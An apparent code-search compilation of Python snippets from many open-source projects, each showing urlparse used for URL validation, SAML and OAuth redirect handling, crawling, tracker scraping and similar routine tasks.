Example #1
0
    def testProcessSLORequestInvalidValid(self):
        """
        Tests the process_slo method of the OneLogin_Saml2_Auth class
        Case Invalid Logout Request
        """
        settings_info = self.loadSettingsJSON()
        request_data = self.get_request()
        message = self.file_contents(join(self.data_path, 'logout_requests', 'logout_request_deflated.xml.base64'))
        request_data['get_data']['SAMLRequest'] = message
        auth = OneLogin_Saml2_Auth(request_data, old_settings=settings_info)
        target_url = auth.process_slo(True)
        parsed_query = parse_qs(urlparse(target_url)[4])
        self.assertEqual(len(auth.get_errors()), 0)
        slo_url = settings_info['idp']['singleLogoutService']['url']
        self.assertIn(slo_url, target_url)
        self.assertIn('SAMLResponse', parsed_query)
        #self.assertNotIn('RelayState', parsed_query)

        auth.set_strict(True)
        auth.process_slo(True)
        # Fails due to destination mismatch
        self.assertEqual(auth.get_errors(), ['invalid_logout_request'])

        auth.set_strict(False)
        target_url_2 = auth.process_slo(True)
        parsed_query_2 = parse_qs(urlparse(target_url_2)[4])
        self.assertEqual(len(auth.get_errors()), 0)
        slo_url = settings_info['idp']['singleLogoutService']['url']
        self.assertIn(slo_url, target_url_2)
        self.assertIn('SAMLResponse', parsed_query_2)
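A note on the idiom used above: urlparse(target_url)[4] indexes the query component of the 6-tuple returned by urlparse (equivalent to .query), and parse_qs turns it into a dict of lists. A minimal standalone sketch with a made-up redirect URL, no SAML involved:

from urllib.parse import urlparse, parse_qs

target_url = 'https://idp.example.com/slo?SAMLResponse=abc&RelayState=xyz'
# index 4 of the parse result is the query string, same as .query
parsed_query = parse_qs(urlparse(target_url)[4])
assert parsed_query == {'SAMLResponse': ['abc'], 'RelayState': ['xyz']}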
Example #2
0
    def make_absolute_redirect_uri(self, uri):
        """Make absolute redirect URIs

        internal redirect uris, e.g. `/user/foo/oauth_handler`
        are allowed in jupyterhub, but oauthlib prohibits them.
        Add `$HOST` header to redirect_uri to make them acceptable.

        Currently unused in favor of monkeypatching
        oauthlib.is_absolute_uri to skip the check
        """
        redirect_uri = self.get_argument('redirect_uri')
        if not redirect_uri or not redirect_uri.startswith('/'):
            return uri
        # make absolute local redirects full URLs
        # to satisfy oauthlib's absolute URI requirement
        redirect_uri = (
            self.request.protocol + "://" + self.request.headers['Host'] + redirect_uri
        )
        parsed_url = urlparse(uri)
        query_list = parse_qsl(parsed_url.query, keep_blank_values=True)
        for idx, item in enumerate(query_list):
            if item[0] == 'redirect_uri':
                query_list[idx] = ('redirect_uri', redirect_uri)
                break

        return urlunparse(urlparse(uri)._replace(query=urlencode(query_list)))
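A standalone sketch of the same query-rewriting idea, outside the JupyterHub handler; the protocol, host and authorization URI below are made-up stand-ins for self.request.* in the method above:

from urllib.parse import urlparse, urlunparse, parse_qsl, urlencode

# Hypothetical stand-ins for self.request.protocol and the Host header
protocol = 'https'
host = 'hub.example.com'
uri = '/oauth2/authorize?client_id=abc&redirect_uri=%2Fuser%2Ffoo%2Foauth_handler'

query_list = parse_qsl(urlparse(uri).query, keep_blank_values=True)
for idx, (key, value) in enumerate(query_list):
    if key == 'redirect_uri' and value.startswith('/'):
        # make the internal redirect target an absolute URL
        query_list[idx] = ('redirect_uri', protocol + '://' + host + value)
        break

print(urlunparse(urlparse(uri)._replace(query=urlencode(query_list))))
# /oauth2/authorize?client_id=abc&redirect_uri=https%3A%2F%2Fhub.example.com%2Fuser%2Ffoo%2Foauth_handler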
Example #3
0
def Url(v):
    """Verify that the value is a URL."""
    try:
        urlparse.urlparse(v)
        return v
    except Exception:
        raise ValueError("Invalid URL: {}".format(v))
Example #4
0
    def testLoginIsPassive(self):
        """
        Tests the login method of the OneLogin_Saml2_Auth class
        Case Login with no parameters. An AuthN Request is built with IsPassive and a redirect is executed
        """
        settings_info = self.loadSettingsJSON()
        return_to = u'http://example.com/returnto'

        auth = OneLogin_Saml2_Auth(self.get_request(), old_settings=settings_info)
        target_url = auth.login(return_to)
        parsed_query = parse_qs(urlparse(target_url)[4])
        sso_url = settings_info['idp']['singleSignOnService']['url']
        self.assertIn(sso_url, target_url)
        self.assertIn('SAMLRequest', parsed_query)
        request = compat.to_string(OneLogin_Saml2_Utils.decode_base64_and_inflate(parsed_query['SAMLRequest'][0]))
        self.assertNotIn('IsPassive="true"', request)

        auth_2 = OneLogin_Saml2_Auth(self.get_request(), old_settings=settings_info)
        target_url_2 = auth_2.login(return_to, False, False)
        parsed_query_2 = parse_qs(urlparse(target_url_2)[4])
        self.assertIn(sso_url, target_url_2)
        self.assertIn('SAMLRequest', parsed_query_2)
        request_2 = compat.to_string(OneLogin_Saml2_Utils.decode_base64_and_inflate(parsed_query_2['SAMLRequest'][0]))
        self.assertNotIn('IsPassive="true"', request_2)

        auth_3 = OneLogin_Saml2_Auth(self.get_request(), old_settings=settings_info)
        target_url_3 = auth_3.login(return_to, False, True)
        parsed_query_3 = parse_qs(urlparse(target_url_3)[4])
        self.assertIn(sso_url, target_url_3)
        self.assertIn('SAMLRequest', parsed_query_3)
        request_3 = compat.to_string(OneLogin_Saml2_Utils.decode_base64_and_inflate(parsed_query_3['SAMLRequest'][0]))
        self.assertIn('IsPassive="true"', request_3)
Example #5
0
    def _isswe(self, url):
        if re.search(r"\.se$", urlparse(url).netloc):
            return "sasong"
        elif re.search(r"\.dk$", urlparse(url).netloc):
            return "saeson"
        else:
            return "sesong"
Example #6
0
    def __init__(self, *args, **kwargs):
        self.__config = {}
        with KRB5Profile() as prof:
            # Load DNS setting
            self.__config["dns"] = prof.get_bool("libdefaults",
                                                 "dns_fallback",
                                                 default=True)
            if "dns_lookup_kdc" in dict(prof.section("libdefaults")):
                self.__config["dns"] = prof.get_bool("libdefaults",
                                                     "dns_lookup_kdc",
                                                     default=True)

            # Load all configured realms
            self.__config["realms"] = {}
            for realm, values in prof.section("realms"):
                rconf = self.__config["realms"].setdefault(realm, {})
                for server, hostport in values:
                    if server not in self.CONFIG_KEYS:
                        continue

                    parsed = urlparse.urlparse(hostport)
                    if parsed.hostname is None:
                        scheme = {'kdc': 'kerberos'}.get(server, 'kpasswd')
                        parsed = urlparse.urlparse(scheme + "://" + hostport)

                    if parsed.port is not None and server == 'admin_server':
                        hostport = hostport.split(':', 1)[0]
                        parsed = urlparse.urlparse("kpasswd://" + hostport)

                    rconf.setdefault(server, []).append(parsed.geturl())
Example #7
0
    def check(self, domain):
        import requests
        from urllib.parse import urlparse

        score = 0
        reason = ""

        nakedreq = requests.get("http://%s" % domain)
        nakedreqURL = urlparse(nakedreq.url)
        wwwreq = requests.get("http://www.%s" % domain)
        wwwreqURL = urlparse(wwwreq.url)

        if nakedreqURL.netloc == domain:
            score = 0
            reason = "Naked domain (%s) does not redirect to www (but www does not redirect to naked)" % domain
            if wwwreqURL.netloc == domain:
                score = 1
                reason = "www.%s redirects to %s" % (domain, domain)
        elif nakedreqURL.netloc == "www.%s" % domain:
            score = -1
            reason = "Naked domain redirects to www."

        return {
            "score": score,
            "reason": reason
        }
Example #8
0
def test_suomifi_logout_sp_request_invalid_token(django_client, django_user_model, fixed_saml_id):
    oidc_client = create_oidc_client()
    user = create_user(django_user_model)
    create_social_user(user)
    create_oidc_token(user, oidc_client)
    django_client.login(username=TEST_USER, password=TEST_PASSWORD)
    args = {
        'id_token_hint': ID_TOKEN_JWT_INVALID,
        'post_logout_redirect_uri': REDIRECT_URI,
    }
    logout_page_url = reverse('end-session') + '?{}'.format(urlencode(args))
    logout_page_response = django_client.get(logout_page_url)

    # If the token hint is not recognized but the client has valid session we
    # still perform logout as we are able to deduce enough information to log
    # the client out. We are unable to remove the ID token and we do not have
    # a way to deduce the final redirect after Suomi.fi callback so the
    # RelayState parameter will be missing from the SAML request.
    assert Token.objects.count() == 1
    assert logout_page_response.status_code == 302
    suomifi_redirect = urlparse(logout_page_response.url)
    suomifi_query_params = parse_qs(suomifi_redirect.query)
    suomifi_saml_request = SAMLUtils.decode_base64_and_inflate(suomifi_query_params['SAMLRequest'][0])
    expected_slo_url = urlparse(getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')['suomifi']['logout_url'])
    expected_logout_request = load_file('suomifi_logout_request.xml')
    expected_logout_signature = load_file('suomifi_logout_without_relaystate_signature.b64').decode()
    assert suomifi_redirect[:3] == expected_slo_url[:3]
    assert suomifi_saml_request == expected_logout_request
    assert 'RelayState' not in suomifi_query_params
    assert suomifi_query_params['Signature'][0] == expected_logout_signature
Example #9
0
def test_suomifi_idp_logout(django_client, fixed_saml_id):
    '''Suomi.fi use cases #4: receiving logout request, and #6: sending logout response'''
    create_oidc_client()
    args = {
        'SAMLRequest': load_file('suomifi_idp_logout_request_encoded.b64').decode(),
        'RelayState': RELAY_STATE,
        'SigAlg': 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256',
        'Signature': load_file('suomifi_idp_logout_signature.b64').decode()
    }
    callback_url = reverse('auth_backends:suomifi_logout_callback') + '?{}'.format(urlencode(args))
    callback_response = django_client.get(callback_url)

    # IdP initiated logout request results in redirect to Suomi.fi SLO URL with
    # SAML response and RelayState from request.
    assert callback_response.status_code == 302
    suomifi_redirect = urlparse(callback_response.url)
    suomifi_query_params = parse_qs(suomifi_redirect.query)
    suomifi_saml_response = SAMLUtils.decode_base64_and_inflate(suomifi_query_params['SAMLResponse'][0])
    expected_slo_url = urlparse(getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')['suomifi']['logout_url'])
    expected_logout_response = load_file('suomifi_idp_logout_response.xml')
    expected_logout_signature = load_file('suomifi_idp_logout_response_signature.b64').decode()
    assert suomifi_redirect[:3] == expected_slo_url[:3]
    assert suomifi_saml_response == expected_logout_response
    assert suomifi_query_params['RelayState'][0] == RELAY_STATE
    assert suomifi_query_params['Signature'][0] == expected_logout_signature
Example #10
0
def status():
    with open(PROJECTS_FILE) as file:
        projects = json.load(file)

    try:
        for project in projects:
            _, host, path, _, _, _ = urlparse(project['travis url'])
            api_url = 'https://api.{host}/repos{path}'.format(**locals())
            resp = get(api_url)

            # See if the Github URL has moved.
            if resp.status_code == 404:
                github_url = 'https://github.com{path}'.format(**locals())
                resp = get(github_url)

                if resp.status_code == 200:
                    _, _, github_path, _, _, _ = urlparse(resp.url)

                    if github_path != path:
                        message = 'Error in {guid}: {path} has moved to {github_path}'
                        kwargs = dict(guid=project['guid'], **locals())
                        raise Exception(message.format(**kwargs))

            if resp.status_code != 200:
                message = 'Missing {guid}: no {travis url}'
                raise Exception(message.format(**project))
    except Exception as e:
        status = str(e)
    else:
        status = 'ok'

    return jsonify(dict(status=status,
                        updated=int(time()),
                        dependencies=['Travis', 'Github'],
                        resources={}))
Example #11
0
def test_suomifi_logout_sp_request(django_client, django_user_model, fixed_saml_id):
    '''Suomi.fi use case #3: sending logout request'''
    oidc_client = create_oidc_client()
    user = create_user(django_user_model)
    create_social_user(user)
    create_oidc_token(user, oidc_client)
    django_client.login(username=TEST_USER, password=TEST_PASSWORD)
    args = {
        'id_token_hint': ID_TOKEN_JWT,
        'post_logout_redirect_uri': REDIRECT_URI,
    }
    logout_page_url = reverse('end-session') + '?{}'.format(urlencode(args))
    logout_page_response = django_client.get(logout_page_url)

    # Logout request results in redirect to Suomi.fi with a SAML message in
    # query parameters. The OIDC token for the user is deleted.
    assert Token.objects.count() == 0
    assert logout_page_response.status_code == 302
    suomifi_redirect = urlparse(logout_page_response.url)
    suomifi_query_params = parse_qs(suomifi_redirect.query)
    suomifi_saml_request = SAMLUtils.decode_base64_and_inflate(suomifi_query_params['SAMLRequest'][0])
    expected_slo_url = urlparse(getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')['suomifi']['logout_url'])
    expected_logout_request = load_file('suomifi_logout_request.xml')
    expected_logout_signature = load_file('suomifi_logout_signature.b64').decode()
    assert suomifi_redirect[:3] == expected_slo_url[:3]
    assert suomifi_saml_request == expected_logout_request
    assert suomifi_query_params['RelayState'][0] == '{"cli": "test_client", "idx": 0}'
    assert suomifi_query_params['Signature'][0] == expected_logout_signature
Example #12
0
    def get_referrer(self, oldurl, newurl):
        """
        Get the referrer to send when doing a request.
        If we should not send a referrer, it will return None.

        Reference: https://en.wikipedia.org/wiki/HTTP_referer

        :param oldurl: Current absolute URL
        :type oldurl: str or None

        :param newurl: Target absolute URL
        :type newurl: str

        :rtype: str or None
        """
        if oldurl is None:
            return None
        old = urlparse(oldurl)
        new = urlparse(newurl)
        # Do not leak secure URLs to insecure URLs
        if old.scheme == 'https' and new.scheme != 'https':
            return None
        # Reloading the page. Usually no referrer.
        if oldurl == newurl:
            return None
        # TODO maybe implement some *optional* privacy features:
        # * do not leak referrer to other domains (often breaks websites)
        # * send a fake referrer (root of the current domain)
        # * never send the referrer
        # Inspired by the RefControl Firefox addon.
        return oldurl
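A tiny standalone sketch of the secure-to-insecure check above, using only urlparse and hypothetical URLs:

from urllib.parse import urlparse

def leaks_referrer(oldurl, newurl):
    # the case in which get_referrer() above returns None:
    # navigating from an https page to a non-https one
    return urlparse(oldurl).scheme == 'https' and urlparse(newurl).scheme != 'https'

assert leaks_referrer('https://bank.example/account', 'http://ads.example/pixel')
assert not leaks_referrer('https://bank.example/a', 'https://bank.example/b')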
Example #13
0
File: calc.py Project: hatred/dcos
def validate_url(url: str):
    try:
        urlparse(url)
    except ValueError as ex:
        raise AssertionError(
            "Couldn't parse given value `{}` as an URL".format(url)
        ) from ex
Example #14
0
def relative_uri(source, target):
    """
    Make a relative URI from source to target.
    """
    su = urlparse.urlparse(source)
    tu = urlparse.urlparse(target)
    extra = list(tu[3:])
    relative = None
    if tu[0] == '' and tu[1] == '':
        if tu[2] == su[2]:
            relative = ''
        elif not tu[2].startswith('/'):
            relative = tu[2]
    elif su[0:2] != tu[0:2]:
        return target

    if relative is None:
        if tu[2] == su[2]:
            relative = ''
        else:
            relative = os.path.relpath(tu[2], os.path.dirname(su[2]))
    if relative == '.':
        relative = ''
    relative = urlparse.urlunparse(["", "", relative] + extra)
    return relative
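A short sketch of the core step (expressing the target path relative to the directory of the source path with os.path.relpath), written against Python 3's urllib.parse rather than the legacy urlparse module used above; the URLs are made up and path handling assumes a POSIX-style os.path:

import os
from urllib.parse import urlparse, urlunparse

source = 'http://example.com/a/b/index.html'
target = 'http://example.com/a/c/other.html'
su, tu = urlparse(source), urlparse(target)

# same scheme and host, different paths: express the target path
# relative to the directory containing the source path
rel_path = os.path.relpath(tu.path, os.path.dirname(su.path))
print(urlunparse(('', '', rel_path, tu.params, tu.query, tu.fragment)))
# ../c/other.html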
Example #15
0
    def find_local_path(self, uri, default_destination=None, netloc=False, infix=""):
        base_uri = uri
        destination = None
        path = None
        postfix = None
        local_path = None
        while destination is None:
            try:
                destination = self.mappings[base_uri]
                postfix = uri[len(base_uri) + 1:]
            except KeyError:
                if path == "":
                    break
                else:
                    (base_uri, path) = DestinationMap.shorten(base_uri)

        if destination is None:
            destination = default_destination

        if destination is None and netloc:
            destination = urlparse(uri).netloc
            l = len(urlparse(uri).scheme) + len(destination)
            postfix = uri[l + 4:]

        if destination is not None and not os.path.isabs(destination):
            destination = os.path.join(self.root_folder, destination)

        if destination is not None and postfix is not None:
            local_path = os.path.join(destination, infix, postfix)

        return base_uri, local_path
Example #16
0
def get_new_command(command, settings):
    url = command.script.split()[1]

    if '/' in command.script:
        return 'whois ' + urlparse(url).netloc
    elif '.' in command.script:
        return 'whois ' + '.'.join(urlparse(url).path.split('.')[1:])
Example #17
0
def url(value):
    try:
        url_str = str(value)
        urlparse(url_str)
        return url_str
    except Exception as err:
        raise ValueError("Invalid URL `{0}`: {1}".format(value, err))
Example #18
0
File: crawler.py Project: kad4/gen
    def isArticle(self, url, soup):
        # Function determines if given url opens an news article
        articleURL = url
        article = False
        netloc = urlparse(url).netloc
        path = urlparse(url).path
        if netloc == 'www.ratopati.com':
            cond1 = re.match(r'/\d\d\d\d/\d\d/\d\d/\d\d\d\d\d\d.html', path) is not None
            div = soup.find('div', {'id': 'sing_cont'})
            cond2 = div is not None
            if (cond1 and cond2) is True:
                articleTitle = div.h2.text.encode('utf-8', 'ignore')
                articleDatelst = path.split('.')[0].split('/')[1:-1]
                articleDate = datetime(int(articleDatelst[0]),int(articleDatelst[1]),int(articleDatelst[2]))

                articleURL = url
                article = True
        if netloc == 'www.setopati.com':
            pass
        else:
            pass

        if article is True:
            return [True, articleTitle, articleDate, articleURL]
        else:
            return [False]
Example #19
0
	def _line(self, l):	# {{{
		if DEBUG > 4:
			log('Debug: Received line: %s' % l)
		if self.address is not None:
			if not l.strip():
				self._handle_headers()
				return
			try:
				key, value = l.split(':', 1)
			except ValueError:
				log('Invalid header line: %s' % l)
				return
			self.headers[key.lower()] = value.strip()
			return
		else:
			try:
				self.method, url, self.standard = l.split()
				for prefix in self.proxy:
					if url.startswith('/' + prefix + '/') or url == '/' + prefix:
						self.prefix = '/' + prefix
						break
				else:
					self.prefix = ''
				address = urlparse(url)
				path = address.path[len(self.prefix):] or '/'
				self.url = path + url[len(address.path):]
				self.address = urlparse(self.url)
				self.query = parse_qs(self.address.query)
			except:
				traceback.print_exc()
				self.server.reply(self, 400)
				self.socket.close()
			return
Example #20
0
def test_spawn_redirect(app, io_loop):
    name = 'wash'
    cookies = app.login_user(name)
    u = app.users[orm.User.find(app.db, name)]
    
    # ensure wash's server isn't running:
    r = api_request(app, 'users', name, 'server', method='delete', cookies=cookies)
    r.raise_for_status()
    status = io_loop.run_sync(u.spawner.poll)
    assert status is not None
    
    # test spawn page when no server is running
    r = get_page('spawn', app, cookies=cookies)
    r.raise_for_status()
    print(urlparse(r.url))
    path = urlparse(r.url).path
    assert path == ujoin(app.base_url, 'user/%s' % name)
    
    # should have started server
    status = io_loop.run_sync(u.spawner.poll)
    assert status is None
    
    # test spawn page when server is already running (just redirect)
    r = get_page('spawn', app, cookies=cookies)
    r.raise_for_status()
    print(urlparse(r.url))
    path = urlparse(r.url).path
    assert path == ujoin(app.base_url, '/user/%s' % name)
Example #21
0
    def _do_redirect(self, response):
        request = response.request
        # done with current response
        url = response.headers.get('location')
        # Handle redirection without scheme (see: RFC 1808 Section 4)
        if url.startswith('//'):
            parsed_rurl = urlparse(request.full_url)
            url = '%s:%s' % (parsed_rurl.scheme, url)
        # Facilitate non-RFC2616-compliant 'location' headers
        # (e.g. '/path/to/resource' instead of
        # 'http://domain.tld/path/to/resource')
        if not urlparse(url).netloc:
            url = urljoin(request.full_url,
                          # Compliant with RFC3986, we percent
                          # encode the url.
                          requote_uri(url))
        history = request.history
        if history and len(history) >= request.max_redirects:
            raise TooManyRedirects(response)

        params = request.inp_params.copy()
        params['history'] = copy(history) if history else []
        params['history'].append(response)
        if response.status_code == 303:
            method = 'GET'
            params.pop('data', None)
            params.pop('files', None)
        else:
            method = request.method
        response.request_again = request_again(method, url, params)
        return response
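A standalone sketch of the two location-header fix-ups above (scheme-relative and host-relative redirects), with made-up URLs; the requote_uri percent-encoding step from the original is omitted here:

from urllib.parse import urlparse, urljoin

full_url = 'https://api.example.com/v1/resource'  # hypothetical original request URL

def absolutize(location):
    # scheme-relative redirect (RFC 1808 section 4): reuse the request scheme
    if location.startswith('//'):
        return '%s:%s' % (urlparse(full_url).scheme, location)
    # host-relative redirect: join against the original request URL
    if not urlparse(location).netloc:
        return urljoin(full_url, location)
    return location

assert absolutize('//cdn.example.com/file') == 'https://cdn.example.com/file'
assert absolutize('/v2/resource') == 'https://api.example.com/v2/resource'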
Example #22
0
def parse(
          target, max_level, stay_local, search_string,
          level=1, parsed_links={}):
    if (level > max_level):
        return parsed_links

    print("Parsing [level %d] - %s" % (level, target))

    try:
        hostname = urlparse(target)[1]
        tree = lxml.html.parse(target)
        root = tree.getroot()

        text = ''.join(root.itertext())
        parsed_links[target] = True if search_string.search(text) else False

        root.make_links_absolute(root.base)
        for link in root.iterlinks():
            href = link[2]
            if (stay_local and urlparse(href)[1] != hostname):
                continue
            if (href not in parsed_links):
                parse(href, max_level, stay_local, search_string,
                      level + 1, parsed_links)
    except Exception as e:
        print("Couldn't parse the target {}: {!s}".format(target, e))

    return parsed_links
Example #23
0
    def match_allowed_origin(self, parsed_origin, pattern):
        """
        Returns ``True`` if the origin is either an exact match or a match
        to the wildcard pattern. Compares scheme, domain, port of origin and pattern.

        A pattern may begin with a scheme followed by a domain, or be just a
        domain without a scheme.
        A domain beginning with a period matches that domain and all of its
        subdomains (for example, ``.example.com`` matches ``example.com``
        and any subdomain); the same holds with a scheme (for example,
        ``http://.example.com`` matches ``http://example.com``). The domain may
        be followed by a port, but the port can be omitted.

        Note: this function assumes that the given origin has a scheme, domain
        and port, or only a domain. Port is optional.
        """
        # Get ParseResult object
        parsed_pattern = urlparse(pattern.lower(), scheme=None)
        if parsed_pattern.scheme is None:
            pattern_hostname = urlparse("//" + pattern).hostname or pattern
            return is_same_domain(parsed_origin.hostname, pattern_hostname)
        # Get origin.port or default ports for origin or None
        origin_port = self.get_origin_port(parsed_origin)
        # Get pattern.port or default ports for pattern or None
        pattern_port = self.get_origin_port(parsed_pattern)
        # Compares hostname, scheme, ports of pattern and origin
        if parsed_pattern.scheme == parsed_origin.scheme and origin_port == pattern_port \
                and is_same_domain(parsed_origin.hostname, parsed_pattern.hostname):
            return True
        return False
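A small sketch of the hostname-extraction trick used above for scheme-less patterns: prepending // makes urlparse treat the value as a network location (hypothetical pattern and origin):

from urllib.parse import urlparse

pattern = '.example.com'                   # hypothetical scheme-less pattern
print(urlparse(pattern).hostname)          # None - no netloc, parsed as a path
print(urlparse('//' + pattern).hostname)   # .example.com

origin = urlparse('https://sub.example.com:443')
print(origin.hostname, origin.port)        # sub.example.com 443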
Example #24
0
def scrape(tracker, hashes):
    """
	Returns the list of seeds, peers and downloads a torrent info_hash has, according to the specified tracker

	Args:
		tracker (str): The announce url for a tracker, usually taken directly from the torrent metadata
		hashes (list): A list of torrent info_hash's to query the tracker for

	Returns:
		A dict of dicts. The key is the torrent info_hash's from the 'hashes' parameter,
		and the value is a dict containing "seeds", "peers" and "complete".
		Eg:
		{
			"2d88e693eda7edf3c1fd0c48e8b99b8fd5a820b2" : { "seeds" : "34", "peers" : "189", "complete" : "10" },
			"8929b29b83736ae650ee8152789559355275bd5c" : { "seeds" : "12", "peers" : "0", "complete" : "290" }
		}
	"""
    tracker = tracker.lower()
    parsed = urlparse(tracker)
    if parsed.scheme == "udp":
        return scrape_udp(parsed, hashes)

    if parsed.scheme in ["http", "https"]:
        if "announce" not in tracker:
            raise RuntimeError("%s doesnt support scrape" % tracker)
        parsed = urlparse(tracker.replace("announce", "scrape"))
        return scrape_http(parsed, hashes)

    raise RuntimeError("Unknown tracker scheme: %s" % parsed.scheme)
Example #25
0
 def check_url_redirection(self, url_record):
     """ Checks redirection in URL and saves new domains, if any """
     current_url = url_record['url']
     recursive, url = self._check_redirection(current_url)
     url_record['final_url'] = url
     if recursive:
         print('    This is a recursive redirect. Action: Skipped!')
         url_record['redirected'] = True
         url_record['recursive'] = True
     else: 
         url_record['recursive'] = False
         if url == current_url:
             url_record['redirected'] = False
         else:
             url_record['redirected'] = True
             domain1 = _extract_domain(current_url)
             domain2 = _extract_domain(url)
             if urlparse(domain1).netloc == urlparse(domain2).netloc:
                 url_record['same_domain'] = True
             else:
                 url_record['same_domain'] = False
                 if domain2 not in self.new_domains:
                     # Make sure the domain is not in the blacklist
                     if urlparse(domain2).netloc not in self.blacklist:
                         # Make sure that the URL is that of a web archive snapshot
                         if '://web.archive.org/web/' in url:
                             print('    New domain found: %s' % domain2)
                             self.new_domains.append(domain2)
                 
     return url_record
Example #26
0
def create_graphml(dists_triu, data, time_max=164, sim_min=0.8):
    size = dists_triu.shape[0]
    G = nx.DiGraph()
    G.add_node(0, step=0, date=0,domain=urlparse(data[0]['link']).netloc)
    date_init = data[0]['published']
    outs = []
    for i in range(1, size):
        pub_i = data[i]['published']
        column = list(dists_triu[:,i])
        pos = get_pos(data, pub_i, column, time_max, sim_min, outs)

        if pos != None:
            if pos not in G.nodes():
                domain_1 = urlparse(data[pos]['link']).netloc
                date_1 = create_date(date_init, data[pos]['published'], 5)
                G.add_node(pos, date=date_1, domain=domain_1)
            if i not in G.nodes():
                domain_2 = urlparse(data[i]['link']).netloc
                date_2 = create_date(date_init, pub_i, 5)
                G.add_node(i, date=date_2, domain=domain_2)

            G.add_edge(pos, i)
        else:
            outs.append(i)
    return G
Example #27
0
def fix_content(content):
    """
    Parse article content to rewrite it for a better reader experience
    """
    parsed_content = BeautifulSoup(content, "html.parser")
    CAMO_KEY = settings.CAMO_KEY
    for img in parsed_content.find_all('img'):
        if img.get('src') and CAMO_KEY and urlparse(img['src']).scheme != 'https':
            img['src'] = get_camo_url(img['src'])

        del img['srcset']
        del img['sizes']
        img['class'] = img.get('class', []) + ['img-responsive']

    for div in parsed_content.find_all('div'):
        del div['style']

    for table in parsed_content.find_all('table'):
        table['class'] = table.get('class', []) + ['table-responsive']

    for a in parsed_content.find_all('a'):
        a['target'] = '_blank'

    for iframe in parsed_content.find_all('iframe'):
        url = urlparse(iframe['src'])
        if url.scheme != 'https' and url.netloc in SSLIFY_HOST_LIST:
            iframe['src'] = url._replace(scheme='https').geturl()

    return str(parsed_content)
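The iframe rewrite above relies on ParseResult._replace; a minimal sketch with a hypothetical embed URL:

from urllib.parse import urlparse

src = 'http://player.example.com/embed/123?autoplay=0'  # hypothetical embed URL
url = urlparse(src)
if url.scheme != 'https':
    src = url._replace(scheme='https').geturl()
print(src)  # https://player.example.com/embed/123?autoplay=0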
Example #28
0
 def __init__(self,
              bucket_key,
              bucket_name=None,
              wildcard_match=False,
              aws_conn_id='aws_default',
              verify=None,
              *args,
              **kwargs):
     super().__init__(*args, **kwargs)
     # Parse
     if bucket_name is None:
         parsed_url = urlparse(bucket_key)
         if parsed_url.netloc == '':
             raise AirflowException('Please provide a bucket_name')
         else:
             bucket_name = parsed_url.netloc
             bucket_key = parsed_url.path.lstrip('/')
     else:
         parsed_url = urlparse(bucket_key)
         if parsed_url.scheme != '' or parsed_url.netloc != '':
             raise AirflowException('If bucket_name is provided, bucket_key' +
                                    ' should be relative path from root' +
                                    ' level, rather than a full s3:// url')
     self.bucket_name = bucket_name
     self.bucket_key = bucket_key
     self.wildcard_match = wildcard_match
     self.aws_conn_id = aws_conn_id
     self.verify = verify
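A standalone sketch of how the bucket name and key are recovered from a full s3:// URL with urlparse (hypothetical bucket and key names):

from urllib.parse import urlparse

parsed_url = urlparse('s3://my-bucket/path/to/object.csv')  # hypothetical full S3 URL
bucket_name = parsed_url.netloc           # 'my-bucket'
bucket_key = parsed_url.path.lstrip('/')  # 'path/to/object.csv'
print(bucket_name, bucket_key)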
Example #29
0
def validate_url(request):
    assert request.method == "GET"
    assert request.is_ajax()
    url = request.GET.get('url')
    assert url
    try:
        URLValidator(url)
    except ValidationError:
        raise AssertionError()
    assert 'HTTP_REFERER' in request.META
    referer = urlparse(request.META.get('HTTP_REFERER'))
    toproxy = urlparse(url)
    local = urlparse(settings.SITE_URL)
    assert toproxy.hostname
    assert referer.hostname == local.hostname
    assert toproxy.hostname != "localhost"
    assert toproxy.netloc != local.netloc
    try:
        # clean this when in python 3.4
        ipaddress = socket.gethostbyname(toproxy.hostname)
    except:
        raise AssertionError()
    assert not ipaddress.startswith('127.')
    assert not ipaddress.startswith('192.168.')
    return url
Example #30
0
def _is_latest(js_option, request):
    """
    Return whether we should serve latest untranspiled code.

    Set according to user's preference and URL override.
    """
    import hass_frontend

    if request is None:
        return js_option == 'latest'

    # latest in query
    if 'latest' in request.query or (
            request.headers.get('Referer') and
            'latest' in urlparse(request.headers['Referer']).query):
        return True

    # es5 in query
    if 'es5' in request.query or (
            request.headers.get('Referer') and
            'es5' in urlparse(request.headers['Referer']).query):
        return False

    # non-auto option in config
    if js_option != 'auto':
        return js_option == 'latest'

    useragent = request.headers.get('User-Agent')

    return useragent and hass_frontend.version(useragent)
Example #31
0
def network_location(url):
    o = urlparse(url, scheme='http')
    o = o.netloc
    return o
Example #32
0
 def _extract_site_name(url):
     parsed = urlparse(url)
     domain = '{uri.netloc}'.format(uri=parsed)
     return domain
Example #33
0
def parse_blob_url(url):
    from urllib import parse
    url_path = parse.urlparse(url)

    parts = url_path.path.lstrip('/').split('/', 1)
    return url_path.netloc, tuple(parts)
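A hedged usage example, run right after the parse_blob_url definition above; the account, container and blob names are hypothetical:

account, parts = parse_blob_url(
    'https://myaccount.blob.core.windows.net/mycontainer/dir/blob.bin')
print(account)  # myaccount.blob.core.windows.net
print(parts)    # ('mycontainer', 'dir/blob.bin')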
Example #34
0
    def __init__(self):
        try:
            from urllib.parse import urlparse
        except ImportError:
            from urlparse import urlparse

        # argv[0] can contain the entire path, so we limit ourselves to the base url
        pid = urlparse(argv[0])
        self.pluginid = '{}://{}/'.format(pid.scheme, pid.netloc)
        self.pluginhandle = int(
            argv[1]) if (1 < len(argv)) and self.pluginid else -1

        self._globals['monitor'] = xbmc.Monitor()
        self._globals['addon'] = xbmcaddon.Addon()
        self._globals['dialog'] = xbmcgui.Dialog()
        # self._globals['dialogprogress'] = xbmcgui.DialogProgress()
        self._globals['hasExtRC'] = xbmc.getCondVisibility(
            'System.HasAddon(script.chromium_remotecontrol)')

        self._globals['DATA_PATH'] = py2_decode(
            xbmc.translatePath(self.addon.getAddonInfo('profile')))
        self._globals['CONFIG_PATH'] = OSPJoin(self._globals['DATA_PATH'],
                                               'config')
        self._globals['HOME_PATH'] = py2_decode(
            xbmc.translatePath('special://home'))
        self._globals['PLUGIN_PATH'] = py2_decode(
            self._globals['addon'].getAddonInfo('path'))

        # With main PATHs configured, we initialise the get/write path attributes
        # and generate/retrieve the device ID
        getConfig.configPath = self._globals['CONFIG_PATH']
        writeConfig.configPath = self._globals['CONFIG_PATH']
        self._globals['deviceID'] = self.genID()

